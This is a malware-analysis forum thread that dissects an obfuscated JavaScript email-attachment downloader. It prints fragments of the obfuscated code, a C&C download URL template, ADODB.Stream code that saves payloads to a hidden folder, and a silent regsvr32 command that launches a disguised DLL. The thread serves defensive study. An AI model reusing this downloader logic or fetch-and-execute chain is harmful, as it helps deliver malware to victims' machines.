HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOFOEVFJEXFOFJEXFOEXCWCVFJEWFJ") ;
sxJsqgxeohytrAHafleiht = NaflwigtGwlnigiLpdkqufrRgxqojrn("XEEECER");
stDpqgkqufrrBIsqxeihy = "";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFOFMFPFSFYFMFSFSFTFYFMFTFVFJFV") ;
stNaflwigtreetrKkxqojr = DpqgkqufrjsdhuiCgxqojr;
stBxmohenrttrDLpdkqufr = akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFCFHFXFRFWFKFQFWFRFKFQFWFSFYDHDGFTFHFT") ;
CgxqojrdjfgaaKkxqojr = WScript.CreateObject(MaqkwugrxxhgsreIsqxeihy);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFKFJFTFUGAFNFUFNFTGAFUDIFVFWFK");
CgxqojrdjfgaaKkxqojr.settimeouts(Gwlnigikjdyhe5gahsCgxqojr, 34566, Gwlnigikjdyhe5gahsCgxqojr, IsqxeihykjshsMaqkwugr);
CgxqojrdjfgaaKkxqojr.Option(AswjleihyutywreNaflwigt) = stNaflwigtreetrKkxqojr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKFDENENEPERENEPEREQEQCNCPCQ");
CgxqojrdjfgaaKkxqojr.Option(Cgxqojrggrres1Lpdkqufr) = stBxmohenrttrDLpdkqufr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKENEPEQERENEPERENEQEREPEQCNCQFE");
CgxqojrdjfgaaKkxqojr.Option(Aswjleihyy356haeKkxqojr) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Option(CgxqojrolkijueBxmohen) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Open(sxJsqgxeohytrAHafleiht, sAswjleihy, CgxqojrertydfgDpqgkqufr);
CgxqojrdjfgaaKkxqojr.Send(stDpqgkqufrrBIsqxeihy);
if((CgxqojrdjfgaaKkxqojr.Status == aEqknugpoeywMaqkwugr+KkxqojrkwerwweDpqgkqufr)){
MaqkwugrllaakkssdKkxqojr = CgxqojrdjfgaaKkxqojr.ResponseBody;
try
{
Gwlnigishfiw11kjshasEqknugp(CgxqojrdjfgaaKkxqojr.ResponseBody,sdGwlnigiawIsqxeihy);
}
catch (Kkxqojr)
{

}

}
}
catch (Kkxqojr)
{

}
CgxqojrdjfgaaKkxqojr = null;
cxjfkgriqdafGwlnigi = null;
}

(1) ADODB.Stream is only use to save files in "c:\ProgramData\UserName" (hidden Folder)
=> if the complete path doesn't exist, it is created.

"C:\ProgramData\UserName\UserNamexmda.jpg"
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"

(2) The Regsvr32 Tool (regsvr32.exe) is used to register UserNamewg.gif in silent mode

Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);

The other files downloaded are not ran by the downloader.

(3) .log files are used

if WScript.ScriptFullName != "C:\ProgramData\UserName\system.wsf"

"C:\ProgramData\UserName\r2.log"
"C:\ProgramData\UserName\auid.log"
"C:\ProgramData\UserName\auidxx60.log"

The WScript.ScriptFullName value is wrote to the end of the file (option 8 : Open a file and write to the end)

Thank you for clarification and explanation

DardiM · Jul 11, 2016

Klipsh said:
Thank you for clarification and explanation

Thank you too

Your post made me want to analyse more this sample, and make dynamic tests

jamescv7 · Jul 11, 2016

A very smart obfuscation implementation provided there, the main target to analyze well despite of random strings are the dropper of files; creation of scripts and especially the payloads to be retrieved from possible C&C server.

DardiM · Jul 12, 2016

jamescv7 said:
A very smart obfuscation implementation provided there, the main target to analyze well despite of random strings are the dropper of files; creation of scripts and especially the payloads to be retrieved from possible C&C server.

All what the js downloader (Anexo_Email_Visualizar.JPG.js) does has been describe above (post 1 & post 9).

I have tried to put obfuscated part description with clear part corresponding,
not only with random string, also with important parts.
I used a lot the spoiler option.

See part (5) for urls used, files dropped : 3 spoilers (one spoiler is inside a spoiler) :

"https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
=> I know the [fileID] for each file downloaded. I didn't write them for security purpose.
Each correspond to one of below files:
"C:\ProgramData\UserName\UserNamexmda.jpg"
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"

Objet_ADODB_Stream = WScript.CreateObject( "ADODB.Stream");
Objet_ADODB_Stream.Type = 1;
Objet_ADODB_Stream.Open();
Objet_ADODB_Stream.Write(object_http.ResponseBody);
Objet_ADODB_Stream.SaveToFile(file_path, 2)
(option 2: Overwrites the file with the data from the currently open Stream object, if the file already exists)

The log files are not created, but if found, the current scrip full name is appended.

One exception :
if (Objet_Scripting_FileSystemObject.FileExists("C:\ProgramData\UserName\auidxx60.log")){
if((WScript.ScriptFullName != "C:\ProgramData\UserName\system.wsf")){
WScript_Quit(0);
}
}

Now I will certainly try to get all files and analyse their content, and UserNamewg.gif behaviour, because of :

Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);

UserNamewg.gif seems to be a PE32 executable (DLL) , UPX compressed
/s => registered in silent mode (display no message boxes)

The way the obfuscation is done makes very easy to replace with a tool data that should be modified when needed : domains, parameters, file ids, file names, for example from a config file.
=> only encrypted data contains these information.
=> just vars linked have to be replace with new encrypted string (often several vars for one whole data).
The main structure of code doesn't need to be changed.

N.B.: I've cleaned the js downloader version, will see if I can join it here in a zip file with original and clean version, with password.
Or a pdf

JUST FOR INFORMATION PURPOSE

DardiM · Jul 13, 2016

Here are two pdf files : one with the original obfuscated code, and the other after I dis-obfuscated / cleaned / cleared the content. We can see in clear part that several functions are doing the same job => it could have been more optimizade.

A problem I've seen : this file / obfuscated method isn't currently detected by several AVs
If you receive such a file, it will be now easy for you to detect it as malware, just by opening it with notepad.

ONLY FOR INFORMATION PURPOSE

Search

Malware Analysis Analysis of the obfuscation techniques used on Anexo_Email_Visualizar.JPG.js - 8/53

DardiM

Level 26

JM Safe

Level 39

DardiM

Level 26

Logethica

Level 13

DardiM

Level 26

DardiM

Level 26

LabZero

frogboy

In memoriam 1961-2018

DardiM

Level 26

frogboy

In memoriam 1961-2018

DardiM

Level 26

LabZero

DardiM

Level 26

jamescv7

Level 85

DardiM

Level 26

DardiM

Level 26

Attachments

Similar threads